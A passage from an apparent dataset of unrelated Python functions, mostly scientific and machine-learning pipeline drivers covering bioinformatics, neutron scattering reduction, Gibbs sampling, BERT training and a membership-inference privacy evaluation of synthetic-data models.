self._exp_dao._name + \"_limmavoom.csv\"\n self._limmavoom = LimmaVoom(out_merge_table, self._exp_dao._group_name, self._exp_dao._replic, out_limmavoom)\n self._limmavoom.run_limmavoom()", "def covering(argv):\n\n FLAGS = flags.FLAGS\n\n evaluate_sequences.execute(argv)", "def _run(self, **params):\n# if softEvidence is None:\n# self.softEvidence = self.mln.softEvidence\n# else:\n# self.softEvidence = softEvidence\n # initialize chains\n chains = MCMCInference.ChainGroup(self)\n for i in range(self.chains):\n chain = GibbsSampler.Chain(self, self.queries)\n chains.chain(chain)\n# if self.softEvidence is not None:\n# chain.setSoftEvidence(self.softEvidence)\n # do Gibbs sampling\n# if verbose and details: print \"sampling...\"\n converged = 0\n steps = 0\n if self.verbose:\n bar = ProgressBar(color='green', steps=self.maxsteps)\n while converged != self.chains and steps < self.maxsteps:\n converged = 0\n steps += 1\n print('STEP {} / {}'.format(steps, self.maxsteps))\n for chain in chains.chains:\n chain.step()\n if self.verbose:\n bar.inc()\n bar.label('%d / %d' % (steps, self.maxsteps))\n# if self.useConvergenceTest:\n# if chain.converged and numSteps >= minSteps:\n# converged += 1\n# if verbose and details:\n# if numSteps % infoInterval == 0:\n# print \"step %d (fraction converged: %.2f)\" % (numSteps, float(converged) / numChains)\n# if numSteps % resultsInterval == 0:\n# chainGroup.getResults()\n# chainGroup.printResults(shortOutput=True)\n # get the results\n return chains.results()[0]", "def run(config, tim=None):\n import dr_lib\n import DST\n \n if tim is not None:\n tim.getTime(False)\n old_time = tim.getOldTime()\n\n if config.data is None:\n raise RuntimeError(\"Need to pass a data filename to the driver \"\\\n +\"script.\")\n\n # Read in geometry if one is provided\n if config.inst_geom is not None:\n if config.verbose:\n print \"Reading in instrument geometry file\"\n \n inst_geom_dst = DST.getInstance(\"application/x-NxsGeom\",\n config.inst_geom)\n else:\n inst_geom_dst = None\n\n # Perform Steps 1-11 on sample data\n d_som1 = dr_lib.process_sas_data(config.data, config, timer=tim,\n inst_geom_dst=inst_geom_dst,\n bkg_subtract=config.bkg_coeff,\n acc_down_time=config.data_acc_down_time.toValErrTuple(),\n bkg_scale=config.bkg_scale,\n trans_data=config.data_trans)\n\n # Perform Steps 1-11 on buffer/solvent only data\n if config.solv is not None:\n s_som1 = dr_lib.process_sas_data(config.solv, config, timer=tim,\n inst_geom_dst=inst_geom_dst,\n dataset_type=\"solvent\",\n bkg_subtract=config.bkg_coeff,\n acc_down_time=config.solv_acc_down_time.toValErrTuple(),\n bkg_scale=config.bkg_scale,\n trans_data=config.solv_trans)\n else:\n s_som1 = None\n\n # Step 12: Subtract buffer/solvent only spectrum from sample spectrum\n d_som2 = dr_lib.subtract_bkg_from_data(d_som1, s_som1,\n verbose=config.verbose,\n timer=tim,\n dataset1=\"data\",\n dataset2=\"solvent\")\n \n del s_som1, d_som1\n\n # Perform Steps 1-11 on empty-can data\n if config.ecan is not None:\n e_som1 = dr_lib.process_sas_data(config.ecan, config, timer=tim,\n inst_geom_dst=inst_geom_dst,\n dataset_type=\"empty_can\",\n bkg_subtract=config.bkg_coeff,\n acc_down_time=config.ecan_acc_down_time.toValErrTuple(),\n bkg_scale=config.bkg_scale,\n trans_data=config.ecan_trans)\n else:\n e_som1 = None\n\n # Step 13: Subtract empty-can spectrum from sample spectrum\n d_som3 = dr_lib.subtract_bkg_from_data(d_som2, e_som1,\n verbose=config.verbose,\n timer=tim,\n dataset1=\"data\",\n dataset2=\"empty_can\")\n \n del e_som1, d_som2\n\n # Perform Steps 1-11 on open beam data\n if config.open is not None:\n o_som1 = dr_lib.process_sas_data(config.open, config, timer=tim,\n inst_geom_dst=inst_geom_dst,\n dataset_type=\"open_beam\",\n bkg_subtract=config.bkg_coeff,\n acc_down_time=config.open_acc_down_time.toValErrTuple(),\n bkg_scale=config.bkg_scale)\n else:\n o_som1 = None\n \n # Step 14: Subtract open beam spectrum from sample spectrum\n d_som4 = dr_lib.subtract_bkg_from_data(d_som3, o_som1,\n verbose=config.verbose,\n timer=tim,\n dataset1=\"data\",\n dataset2=\"open_beam\")\n \n del o_som1, d_som3\n\n # Perform Steps 1-11 on dark current data\n if config.dkcur is not None:\n dc_som1 = dr_lib.process_sas_data(config.open, config, timer=tim,\n inst_geom_dst=inst_geom_dst,\n dataset_type=\"dark_current\",\n bkg_subtract=config.bkg_coeff)\n else:\n dc_som1 = None\n \n # Step 15: Subtract dark current spectrum from sample spectrum\n d_som5 = dr_lib.subtract_bkg_from_data(d_som4, dc_som1,\n verbose=config.verbose,\n timer=tim,\n dataset1=\"data\",\n dataset2=\"dark_current\")\n \n del dc_som1, d_som4 \n\n # Create 2D distributions is necessary\n if config.dump_Q_r:\n d_som5_1 = dr_lib.create_param_vs_Y(d_som5, \"radius\", \"param_array\",\n config.r_bins.toNessiList(),\n rebin_axis=config.Q_bins.toNessiList(),\n binnorm=True,\n y_label=\"S\",\n y_units=\"Counts / A^-1 m\",\n x_labels=[\"Radius\", \"Q\"],\n x_units=[\"m\", \"1/Angstroms\"])\n\n hlr_utils.write_file(config.output, \"text/Dave2d\", d_som5_1,\n output_ext=\"qvr\", verbose=config.verbose,\n data_ext=config.ext_replacement,\n path_replacement=config.path_replacement,\n message=\"S(r, Q) information\")\n\n del d_som5_1\n \n if config.dump_Q_theta:\n d_som5_1 = dr_lib.create_param_vs_Y(d_som5, \"polar\", \"param_array\",\n config.theta_bins.toNessiList(),\n rebin_axis=config.Q_bins.toNessiList(),\n binnorm=True,\n y_label=\"S\",\n y_units=\"Counts / A^-1 rads\",\n x_labels=[\"Polar Angle\", \"Q\"],\n x_units=[\"rads\", \"1/Angstroms\"])\n\n hlr_utils.write_file(config.output, \"text/Dave2d\", d_som5_1,\n output_ext=\"qvt\", verbose=config.verbose,\n data_ext=config.ext_replacement,\n path_replacement=config.path_replacement,\n message=\"S(theta, Q) information\")\n\n del d_som5_1\n \n # Steps 16 and 17: Rebin and sum all spectra\n if config.verbose:\n print \"Rebinning and summing for final spectrum\"\n \n if tim is not None:\n tim.getTime(False)\n\n if config.dump_frac_rebin:\n set_conf = config\n else:\n set_conf = None\n\n d_som6 = dr_lib.sum_by_rebin_frac(d_som5, config.Q_bins.toNessiList(),\n configure=set_conf)\n\n if tim is not None:\n tim.getTime(msg=\"After rebinning and summing for spectrum\") \n\n del d_som5\n\n if config.facility == \"LENS\":\n # Step 18: Scale final spectrum by Q bin centers\n if config.verbose:\n print \"Scaling final spectrum by Q centers\"\n \n if tim is not None:\n tim.getTime(False)\n\n d_som7 = dr_lib.fix_bin_contents(d_som6, scale=True, width=True,\n units=\"1/Angstroms\")\n\n if tim is not None:\n tim.getTime(msg=\"After scaling final spectrum\") \n else:\n d_som7 = d_som6\n\n del d_som6\n\n # If rescaling factor present, rescale the data\n if config.rescale_final is not None:\n import common_lib\n d_som8 = common_lib.mult_ncerr(d_som7, (config.rescale_final, 0.0))\n else:\n d_som8 = d_som7\n\n del d_som7\n \n hlr_utils.write_file(config.output, \"text/Spec\", d_som8,\n verbose=config.verbose,\n replace_path=False,\n replace_ext=False,\n message=\"combined S(Q) information\")\n\n # Create 1D canSAS file\n hlr_utils.write_file(config.output, \"text/canSAS\", d_som8,\n verbose=config.verbose,\n output_ext=\"xml\",\n data_ext=config.ext_replacement, \n path_replacement=config.path_replacement,\n message=\"combined S(Q) information\")\n \n d_som8.attr_list[\"config\"] = config\n\n hlr_utils.write_file(config.output, \"text/rmd\", d_som8,\n output_ext=\"rmd\",\n data_ext=config.ext_replacement, \n path_replacement=config.path_replacement,\n verbose=config.verbose,\n message=\"metadata\")\n\n if tim is not None:\n tim.setOldTime(old_time)\n tim.getTime(msg=\"Total Running Time\")", "def extra_rnaseq(args, gtf):\n log.info('running for other reference')\n group = 'extra'\n ## update gtf\n # args['gtf'] = gtf\n\n ## check if extra_index exists\n if args['extra_index'] is None:\n log.warning('extra analysis skipped, index not exists: {}'.format(args['extra_index']))\n elif not os.path.exists(gtf):\n log.warning('extra analysis skipped, gtf file not exists: {}'.foramt(gtf))\n else:\n ## control, args['c1']\n ctl_args = args.copy()\n ctl_args['path_out'] = os.path.join(args['path_out'], args['C']) \n ctl_bam = extra_aligner(args['c1'], args['C'], ctl_args)\n ## flaten\n ctl_bam = [item for sublist in ctl_bam for item in sublist]\n\n ## count reads\n ctl_count = os.path.join(args['path_out'], args['C'], group, 'count', 'count.txt')\n run_featureCounts(\n gtf=gtf, \n bam_files=ctl_bam, \n out=ctl_count, \n strandness=args['s'], \n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## treatment, args['t1']\n tre_args = args.copy()\n tre_args['path_out'] = os.path.join(args['path_out'], args['T'])\n tre_bam = extra_aligner(args['t1'], args['T'], tre_args)\n tre_bam = [item for sublist in tre_bam for item in sublist]\n\n ## count reads\n tre_count = os.path.join(args['path_out'], args['T'], group, 'count', 'count.txt')\n run_featureCounts(\n gtf=gtf, \n bam_files=tre_bam, \n out=tre_count, \n strandness=args['s'], \n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## de analysis using DESeq2\n de_path = os.path.join(args['path_out'], args['C'] + '_vs_' + args['T'])\n deseq2_exe(\n control=ctl_count, \n treatment=tre_count, \n path_out=de_path, \n genome=args['genome'], \n nameA=args['C'], \n nameB=args['T'], \n group=group,\n path_suffix='sense')\n\n ###############################\n ## antisense strand analysis ##\n ###############################\n # determine the strandness\n if args['s'] == 2:\n args['anti_strand'] = 1\n elif args['s'] == 1:\n args['anti_strand'] = 2\n else:\n args['anti_strand'] = 0\n\n ## count reads\n ctl_count = os.path.join(args['path_out'], args['C'], group, 'count', 'count.anti.txt')\n run_featureCounts(\n gtf=gtf, \n bam_files=ctl_bam, \n out=ctl_count, \n strandness=args['anti_strand'], \n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## count reads\n tre_count = os.path.join(args['path_out'], args['T'], group, 'count', 'count.anti.txt')\n run_featureCounts(\n gtf=gtf, \n bam_files=tre_bam, \n out=tre_count, \n strandness=args['anti_strand'], \n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## de analysis using DESeq2\n de_path = os.path.join(args['path_out'], args['C'] + '.vs.' + args['T'])\n deseq2_exe(\n control=ctl_count, \n treatment=tre_count, \n path_out=de_path, \n genome=args['genome'], \n nameA=args['C'], \n nameB=args['T'], \n group=group,\n path_suffix='antisense')", "def main():\n args = get_args()\n annot_fp = args.annotations\n out_fp = args.outfile\n blast_fp = args.positional\n\n #print('output_arg = \"{}\"'.format(out_fp))\n #print('annotation_arg = \"{}\"'.format(annot_fp))\n #print('blast_fp = \"{}\"'.format(blast_fp))\n\n if not os.path.isfile(annot_fp):\n print(\"\\\"{}\\\" is not a file\".format(annot_fp))\n exit(1)\n if not os.path.isfile(blast_fp):\n print(\"\\\"{}\\\" is not a file\".format(blast_fp))\n exit(1)\n\n #Load the annotations\n annots_dict = {}\n with open(annot_fp, 'r') as f:\n for l in f:\n larr = l[:-1].split(\",\")\n annots_dict[larr[0]] = larr[6:]\n\n header_str = \"seq_id\\tpident\\tgenus\\tspecies\"\n if out_fp != \"\":\n out = open(out_fp, 'w')\n out.write(\"{}\\n\".format(header_str))\n else:\n print(header_str)\n\n with open(blast_fp, 'r') as f:\n for l in f:\n larr = l.split(\"\\t\")\n seq_id = larr[1]\n tax_info = annots_dict.get(seq_id, [\"BAD\", \"BAD\"])\n if tax_info[0] == \"BAD\":\n warn(msg=\"Cannot find seq {} in lookup\".format(seq_id))\n continue\n genus = tax_info[0]\n species = tax_info[1]\n if genus == \"\":\n genus = \"NA\"\n if species == \"\":\n species = \"NA\"\n if out_fp == \"\":\n print(\"{}\\t{}\\t{}\\t{}\".format(seq_id, larr[2], genus, species))\n else:\n out.write(\"{}\\t{}\\t{}\\t{}\\n\".format(seq_id, larr[2], genus, species))\n\n if out_fp != \"\":\n out.close()", "def DefaultArgumentParser():\n parser = common.createBasicArgumentParser(\"execute your analysis on a readily initialized sample folder\")\n # add some extra arguments which are helpful for this step of the analysis\n parser.add_argument('--restrict', metavar=\"PATHS\", dest=\"pathselect\", default=\"\", help='restrict the analysis to a path set')\n parser.add_argument('--downmergeTo', metavar=\"DOWNMERGETO\", dest=\"downmergeTo\", default=\"\", help='specify alternative downmerging targets to the paths listed at \\'--restrict\\'')\n parser.add_argument('--downmerge', action=\"store_const\", const=True, default=False,\n help='if the analysis is restricted to a path set, objects will be merged up to the paths specified in \\'--restrict\\'')\n parser.add_argument('--dummy', dest=\"dummy\", action=\"store_const\", const=True, default=False, help='run a dummy analysis (do not read data)')\n parser.add_argument('--debug', dest=\"debug\", action=\"store_const\", const=True, default=False,\n help='run a debug analysis (same as \"-c outputFile=debug.root maxEvents=100\")')\n parser.add_argument('--robust', dest=\"robust\", action=\"store_const\", const=True, default=False,\n help='run robustly over non-well-formed inputs. useful for debugging. does not support many vital analysis features.')\n parser.add_argument('--width', dest=\"width\", type=int, default=0, help=\"console width for printouts\")\n parser.add_argument('--jobID', dest=\"jobID\", type=str, default=\"analyze\", help=\"identifier for the job executing this instance\")\n return parser", "def run_analysis(configfile, resultsdir):\n\n\t# Header\n\tInOut.print_head()\n\n\t#reading config from configfile\n\tlistname, filetype, selected_indicators, RVext = InOut.read_config(configfile)\n\n\t#read observations from obslist\n\tfile_names, dataset, BJDs, RVextvalues = InOut.read_obslist(listname, filetype, RVext)\n\n\t#fit Gaussian function to the data\n\tGauss_params = Gaussfitting.dataset_gaussfit(dataset)\n\n\t# Identify selected indicators\n\tIndicatorList = [\"BIS\",\"BIS-\",\"BIS+\",\"biGauss\",\"Vasy\", \"Vspan\", \"FWHM\"]\n\tIndSelected = [ind for ind,selected in zip(IndicatorList, selected_indicators) if selected == 1]\n\n\t#Apply indicators\n\toutput_ASCII_list = [Indicators.run_indicator_analysis(ind, dataset, Gauss_params, file_names, resultsdir, RVextvalues) for ind in IndSelected]\n\n\t#Wrap the results in one single file\n\tInOut.wrapRes(output_ASCII_list, BJDs, resultsdir)\n\n\t# The End\n\tInOut.print_foot()", "def index(args):\n\n logging.info('Starting indexing sequences in %s' % args.sequences)\n logging.error('TODO: Implement indexing!')", "def main():\n indicator = AyatanaIndicator()\n indicator.run()", "def run(sim_attr_generator):\n#TODO: clean\n#TODO: integrate analyses\n def analyze_and_save(simulation,simulation_attributes):\n#? Ugly conf file analyses integration.\n if simulation_attributes.analyses and Args.output_file != None:\n verbose_print(\"Saving analyses for {0}.\".format(simulation_attributes.id_name),2)\n results = analyze_datas(\n simulation.result,\n simulation_attributes.analyses\n )\n plotables = ana_results_to_plotables(\n results,\n simulation_attributes.analyses\n )\n#TODO error handling for save\n analysis_save_dm(\n results,\n plotables,\n simulation_attributes.analyses,\n simulation_attributes.id_name\n )\n\n def save_simulation(simulation,simulation_attributes):\n if not simulation_attributes.analyses and Args.output_file != None:\n verbose_print(\"Saving simulation datas of {0}.\".format(\n simulation_attributes.id_name\n ),2) \n try:\n np.save(\n simulation_attributes.id_name,\n simulation.result\n )\n except:\n raise EnvironmentError(\"Can't save data to {}.\".format(\n simulation_attributes.id_name\n ))\n\n verbose_print(\"Starting simulation run.\",1)\n for i,simulation_attributes in enumerate(sim_attr_generator):\n verbose_print(\"Starting simulation number {0}: {1}\".format(\n i,\n simulation_attributes.id_name\n ),2)\n simulation = Simulation(\n SimulationVariables(simulation_attributes)\n )\n simulation.start()\n save_simulation(simulation,simulation_attributes)\n analyze_and_save(simulation,simulation_attributes)", "def main():\n\n argparser = ArgumentParser()\n argparser.add_argument('--datapath', '-D', type=str, help='Relative path to cwd of a local data file')\n argparser.add_argument('--attack_model', '-AM', type=str, default='ANY', choices=['RandomForest', 'LogReg', 'LinearSVC', 'SVC', 'KNN', 'ANY'])\n argparser.add_argument('--runconfig', '-RC', default='runconfig_mia.json', type=str, help='Path relative to cwd of runconfig file')\n argparser.add_argument('--outdir', '-O', default='outputs/test', type=str, help='Path relative to cwd for storing output files')\n args = argparser.parse_args()\n\n # Load runconfig\n with open(path.join(cwd, args.runconfig)) as f:\n runconfig = json.load(f)\n print('Runconfig:')\n print(runconfig)\n\n # Load data\n RawDF, metadata = load_local_data_as_df(path.join(cwd, args.datapath))\n dname = args.datapath.split('/')[-1]\n RawDF['ID'] = [f'ID{i}' for i in arange(len(RawDF))]\n RawDF = RawDF.set_index('ID')\n\n print(f'Loaded data {dname}:')\n print(RawDF.info())\n\n # Randomly select nt target records T = (t_1, ..., t_(nt))\n targetIDs = choice(list(RawDF.index), size=runconfig['nTargets'], replace=False).tolist()\n Targets = RawDF.loc[targetIDs, :]\n\n # Drop targets from sample population\n RawDFdropT = RawDF.drop(targetIDs)\n\n # Add a crafted outlier target to the evaluation set\n targetCraft = craft_outlier(RawDF, runconfig['sizeTargetCraft'])\n targetIDs.extend(list(set(targetCraft.index)))\n Targets = Targets.append(targetCraft)\n\n # Sample adversary's background knowledge RawA\n rawAidx = choice(list(RawDFdropT.index), size=runconfig['sizeRawA'], replace=False).tolist()\n\n # Sample k independent target test sets\n rawTindices = [choice(list(RawDFdropT.index), size=runconfig['sizeRawT'], replace=False).tolist() for nr in range(runconfig['nIter'])]\n\n # List of candidate generative models to evaluate\n gmList = []\n for gm, paramsList in runconfig['generativeModels'].items():\n if gm == 'IndependentHistogram':\n for params in paramsList:\n gmList.append(IndependentHistogram(*params))\n elif gm == 'BayesianNet':\n for params in paramsList:\n gmList.append(BayesianNet(*params))\n elif gm == 'PrivBayes':\n for params in paramsList:\n gmList.append(PrivBayes(*params))\n elif gm == 'CTGAN':\n for params in paramsList:\n gmList.append(CTGAN(metadata, *params))\n elif gm == 'PateGan':\n for params in paramsList:\n gmList.append(PateGan(metadata, *params))\n else:\n raise ValueError(f'Unknown GM {gm}')\n\n for GenModel in gmList:\n print(f'----- {GenModel.__name__} -----')\n\n FeatureList = [NaiveFeatureSet(GenModel.datatype), HistogramFeatureSet(GenModel.datatype, metadata), CorrelationsFeatureSet(GenModel.datatype, metadata), EnsembleFeatureSet(GenModel.datatype, metadata)]\n\n prior = {LABEL_IN: runconfig['prior']['IN'], LABEL_OUT: runconfig['prior']['OUT']}\n\n if args.attack_model == 'RandomForest':\n AttacksList = [MIAttackClassifierRandomForest(metadata, prior, F) for F in FeatureList]\n elif args.attack_model == 'LogReg':\n AttacksList = [MIAttackClassifierLogReg(metadata, prior, F) for F in FeatureList]\n elif args.attack_model == 'LinearSVC':\n AttacksList = [MIAttackClassifierLinearSVC(metadata, prior, F) for F in FeatureList]\n elif args.attack_model == 'SVC':\n AttacksList = [MIAttackClassifierSVC(metadata, prior, F) for F in FeatureList]\n elif args.attack_model == 'KNN':\n AttacksList = [MIAttackClassifierKNN(metadata, prior, F) for F in FeatureList]\n elif args.attack_model == 'ANY':\n AttacksList = []\n for F in FeatureList:\n AttacksList.extend([MIAttackClassifierRandomForest(metadata, prior, F),\n MIAttackClassifierLogReg(metadata, prior, F),\n MIAttackClassifierKNN(metadata, prior, F)])\n else:\n raise ValueError(f'Unknown AM {args.attack_model}')\n\n # Run privacy evaluation under MIA adversary\n results = evaluate_mia(GenModel, AttacksList, RawDFdropT, Targets, targetIDs, rawAidx, rawTindices,\n runconfig['sizeRawT'], runconfig['sizeSynT'], runconfig['nSynT'],\n runconfig['nSynA'], runconfig['nShadows'], metadata)\n\n outfile = f\"{dname}{GenModel.__name__}MIA\"\n\n with open(path.join(f'{args.outdir}', f'{outfile}.json'), 'w') as f:\n json.dump(results, f, indent=2, default=json_numpy_serialzer)", "def main_exb(args):\n\n print(\"Running for you in EXB mode ... \")\n\n # Read in transcript ID list.\n tr_ids_dic = cliplib.read_ids_into_dic(args.in_tr_list)\n tr_ids_c = len(tr_ids_dic)\n assert tr_ids_c, \"no transcript IDs read in from \\\"%s\\\"\" %(args.in_tr_list)\n print(\"# transcript IDs read in: %i\" %(tr_ids_c))\n\n # Generate .tmp files.\n random_id = uuid.uuid1()\n tmp_bed1 = str(random_id) + \".exon_regions.tmp.bed\"\n random_id = uuid.uuid1()\n tmp_bed2 = str(random_id) + \".overlapping_sites.tmp.bed\"\n random_id = uuid.uuid1()\n tmp_bed3 = str(random_id) + \".extended_sites.tmp.bed\"\n random_id = uuid.uuid1()\n tmp_bed4 = str(random_id) + \".base_overlaps.tmp.bed\"\n\n # Extract exon regions for given transcripts.\n cliplib.gtf_extract_exon_bed(args.in_gtf, tmp_bed1,\n tr_ids_dic=tr_ids_dic)\n\n # Check .bed for content.\n c_in = cliplib.count_file_rows(args.in_bed)\n assert c_in, \"input .bed file \\\"%s\\\" is empty\" %(args.in_bed)\n\n # First get regions inside exons (overlapping >= 90 % with them).\n params = \"-s -u -wa -f 0.90\"\n cliplib.intersect_bed_files(args.in_bed, tmp_bed1, params, tmp_bed2)\n\n # Filter and extend overlapping sites.\n TMPOUT = open(tmp_bed3,\"w\")\n c_ol = 0\n id2len_dic = {}\n id2stats_dic = {}\n with open(tmp_bed2) as f:\n for line in f:\n cols = line.strip().split(\"\\t\")\n seq_id = cols[0]\n site_s = int(cols[1])\n site_e = int(cols[2])\n site_id = cols[3]\n site_sc = float(cols[4])\n site_pol = cols[5]\n site_l = site_e - site_s\n # Filter by site score.\n if args.score_thr is not None:\n if args.rev_filter:\n if site_sc > args.score_thr:\n continue\n else:\n if site_sc < args.score_thr:\n continue\n # Filter by site length.\n if args.max_len:\n if site_l > args.max_len:\n continue\n if args.min_len:\n if site_l < args.min_len:\n continue\n # Check whether score is whole number.\n if not site_sc % 1:\n site_sc = int(site_sc)\n # Convert to string.\n new_sc = str(site_sc)\n # Extend site.\n new_s = site_s - args.max_dist - 1\n new_e = site_e + args.max_dist + 1\n new_l = new_e - new_s\n id2len_dic[site_id] = new_l\n c_ol += 1\n # Store original region.\n id2stats_dic[site_id] = \"%s\\t%i\\t%i\\t%s\\t%s\\t%s\" %(seq_id,site_s,site_e,site_id,site_sc,site_pol)\n # Output extended region.\n TMPOUT.write(\"%s\\t%i\\t%i\\t%s\\t%s\\t%s\\n\" % (seq_id,new_s,new_e,site_id,site_sc,site_pol))\n f.close()\n TMPOUT.close()\n\n # Overlap sites with exons, get bases overlapping.\n cliplib.intersect_bed_files(tmp_bed3, tmp_bed1, \"-s\", tmp_bed4)\n\n # Output .bed.\n OUT = open(args.out_bed,\"w\")\n seen_dic = {}\n # Number of sites close to exon ends.\n c_close = 0\n\n # Get sites within border range.\n with open(tmp_bed4) as f:\n for line in f:\n cols = line.strip().split(\"\\t\")\n site_s = int(cols[1])\n site_e = int(cols[2])\n site_id = cols[3]\n if site_id in seen_dic:\n continue\n site_l = site_e - site_s\n full_l = id2len_dic[site_id]\n bed_row = id2stats_dic[site_id]\n if not full_l == site_l:\n c_close += 1\n OUT.write(\"%s\\n\" %(bed_row))\n seen_dic[site_id] = 1\n\n clean_up = True\n if clean_up:\n # Remove tmp files.\n if os.path.exists(tmp_bed1):\n os.remove(tmp_bed1)\n if os.path.exists(tmp_bed2):\n os.remove(tmp_bed2)\n if os.path.exists(tmp_bed3):\n os.remove(tmp_bed3)\n if os.path.exists(tmp_bed4):\n os.remove(tmp_bed4)\n\n # Report results.\n print(\"exb output stats (post-filtering)\")\n print(\"=================================\")\n print(\"Number of --in regions: %i\" %(c_in))\n print(\"Number of --in regions overlapping with exon regions: %i\" %(c_ol))\n print(\"Number of --in regions close to exon ends: %i\" %(c_close))\n print(\"Regions close to exon ends written to:\\n%s\\n\" %(args.out_bed))", "def main(args):\n\n # Compose the model list\n modellist = []\n if args['model']:\n modellist.append(bmark.ModelInfo(args['model'], os.getcwd(), args['classname']))\n\n # Load the benchmark settings\n benchmark = None\n benchmark = bmark.load_benchmark(args['benchmark'])\n corresponding_data = False\n if 'corresponding_data' in benchmark:\n corresponding_data = benchmark['corresponding_data']\n\n # Only extend if not cached\n cache_df = None\n if not args['cache']:\n modellist.extend(benchmark['models'])\n else:\n cache_df = pd.read_csv(args['cache'])\n\n # Extract comparator settings from benchmark description\n eval_comparator = comparator.EqualityComparator()\n if 'comparator' in benchmark:\n if benchmark['comparator'] == 'nvc':\n eval_comparator = comparator.NVCComparator()\n\n # Run the model evaluation\n is_silent = (args['output'] in ['html', 'server'])\n eva = None\n if benchmark['type'] == 'adaption':\n eva = evaluator.AdaptionEvaluator(\n modellist,\n eval_comparator,\n benchmark['data.test'],\n train_datafile=benchmark['data.train'],\n train_data_person=benchmark['data.train_person'],\n silent=is_silent,\n corresponding_data=corresponding_data,\n domain_encoders=benchmark['domain_encoders'],\n cache_df=cache_df\n )\n elif benchmark['type'] == 'coverage':\n # Check for benchmark validity\n if benchmark['data.train'] or benchmark['data.train_person']:\n print('WARNING: Ignoring specified training and train_person data ' \\\n + 'for coverage evaluation...')\n\n eva = evaluator.CoverageEvaluator(\n modellist,\n eval_comparator,\n benchmark['data.test'],\n train_datafile=benchmark['data.train'],\n train_data_person=benchmark['data.train_person'],\n silent=is_silent,\n corresponding_data=corresponding_data,\n domain_encoders=benchmark['domain_encoders'],\n cache_df=cache_df\n )\n else:\n raise ValueError('Unknown benchmark type: {}'.format(benchmark['type']))\n\n with silence_stdout(is_silent):\n res_df = eva.evaluate()\n\n if 'save' in args:\n res_df.to_csv(args['save'], index=False)\n\n # Run the metric visualizer\n htmlcrtr = html_creator.HTMLCreator([\n viz_plot.AccuracyVisualizer(),\n viz_plot.BoxplotVisualizer(),\n viz_plot.TableVisualizer()\n ])\n\n # Prepare the benchmark output information and visualize the evaluation results\n benchmark_info = {\n 'name': os.path.basename(args['benchmark']),\n 'data.train': os.path.basename(\n benchmark['data.train']) if benchmark['data.train'] else '',\n 'data.train_person': os.path.basename(\n benchmark['data.train_person']) if benchmark['data.train_person'] else '',\n 'data.test': os.path.basename(benchmark['data.test']),\n 'type': benchmark['type'],\n 'corresponding_data': benchmark['corresponding_data'],\n 'domains': list(res_df['domain'].unique()),\n 'response_types': list(res_df['response_type'].unique()),\n }\n\n if args['output'] == 'browser':\n html = htmlcrtr.to_html(res_df, benchmark_info, embedded=False)\n server.load_in_default_browser(html.encode('utf8'))\n elif args['output'] == 'server':\n html = htmlcrtr.to_html(res_df, benchmark_info, embedded=True)\n sys.stdout.buffer.write(html.encode('utf-8'))\n elif args['output'] == 'html':\n html = htmlcrtr.to_html(res_df, benchmark_info, embedded=False)\n print(html)", "def analyze_run():\n file_datas_dict = load_datas(Args.data_files)\n plotables_dict = dict()\n for file_name, datas in file_datas_dict.viewitems():\n analized_datas = analyze_datas(datas,Args.analysis_attributes)\n plotables = ana_results_to_plotables(\n analized_datas,\n Args.analysis_attributes\n )\n if Args.dm_file_out:\n analysis_save_dm(\n analized_datas,\n plotables,\n Args.analysis_attributes,\n Args.dm_file_out\n )\n if Args.mat_file_out:\n analysis_save(\n plotables,\n Args.analysis_attributes,\n Args.mat_file_out\n )\n if Args.verbose:\n plotables_dict[file_name] = plotables\n if Args.verbose:\n ana_plot_figures(plotables_dict,Args.analysis_attributes)", "def main():\r\n parser = get_parser()\r\n config = parser.parse_args(['--cfg', 'config.yaml'])\r\n result_filing.init_config_vars(config)\r\n run_id = config.info.run_id\r\n logger = custom_logger.CustomLogger(run_id+':'+file_id)\r\n\r\n operation = config.info.operation_type\r\n logger.info(\"Selected operation type %s.\"%(operation))\r\n if operation == const.TRAIN_OP:\r\n train.train_model(config)\r\n elif operation == const.DEPLOY_OP:\r\n test.test_model(config)", "def main():\n\n ############################ variable settings #################################\n parser = argparse.ArgumentParser(description='Run Subtask C of GermEval 2017 Using Pre-Trained Language Model.')\n parser.add_argument('--seed', type=int, default=42, help='Random seed.')\n parser.add_argument('--lang_model', type=str, default='bert-base-german-dbmdz-uncased', help='The pre-trained language model.')\n parser.add_argument('--epochs', type=int, default=4, help='Number of epochs for training.')\n parser.add_argument('--lr', type=float, default=5e-5, help='The learning rate.')\n parser.add_argument('--max_len', type=int, default=256, help='The maximum sequence length of the input text.')\n parser.add_argument('--batch_size', type=int, default=32, help='Your train set batch size.')\n parser.add_argument('--df_path', type=str, default='./data/', help='The data directory.') \n parser.add_argument('--train_data', type=str, default='train_df_cat.tsv', help='The filename of the input train data.')\n parser.add_argument('--dev_data', type=str, default='dev_df_cat.tsv', help='The filename of the input development data.')\n parser.add_argument('--test_data1', type=str, default='test_syn_df_cat.tsv', help='The filename of the first input test data (synchronic).')\n parser.add_argument('--test_data2', type=str, default='test_dia_df_cat.tsv', help='The filename of the second input test data (diachronic).')\n parser.add_argument('--output_path', type=str, default='./output/subtaskC/', help='The output directory of the model and predictions.')\n parser.add_argument(\"--train\", default=True, action=\"store_true\", help=\"Flag for training.\")\n parser.add_argument(\"--save_prediction\", default=False, action=\"store_true\", help=\"Flag for saving predictions.\")\n parser.add_argument(\"--save_cr\", default=False, action=\"store_true\", help=\"Flag for saving confusion matrix.\")\n parser.add_argument(\"--exclude_general\", default=False, action=\"store_true\", help=\"Flag for excluding category Allgemein.\")\n parser.add_argument(\"--exclude_neutral\", default=False, action=\"store_true\", help=\"Flag for excluding neutral polarity.\")\n parser.add_argument(\"--exclude_general_neutral\", default=False, action=\"store_true\", help=\"Flag for excluding category Allgemein:neutral.\")\n args = parser.parse_args()\n ################################################################################\n set_all_seeds(args.seed)\n device, n_gpu = initialize_device_settings(use_cuda=True)\n \n # Load data\n train_df = pd.read_csv(args.df_path + args.train_data, delimiter = '\\t')\n dev_df = pd.read_csv(args.df_path + args.dev_data, delimiter = '\\t')\n test_syn_df = pd.read_csv(args.df_path + args.test_data1, delimiter = '\\t')\n test_dia_df = pd.read_csv(args.df_path + args.test_data2, delimiter = '\\t')\n \n # Create a tokenizer\n lower_case = False\n if args.lang_model[-7:] == \"uncased\":\n lower_case = True\n\n if args.lang_model[:4] == \"bert\":\n model_class = \"BERT\"\n tokenizer = BertTokenizer.from_pretrained(args.lang_model, do_lower_case=lower_case, 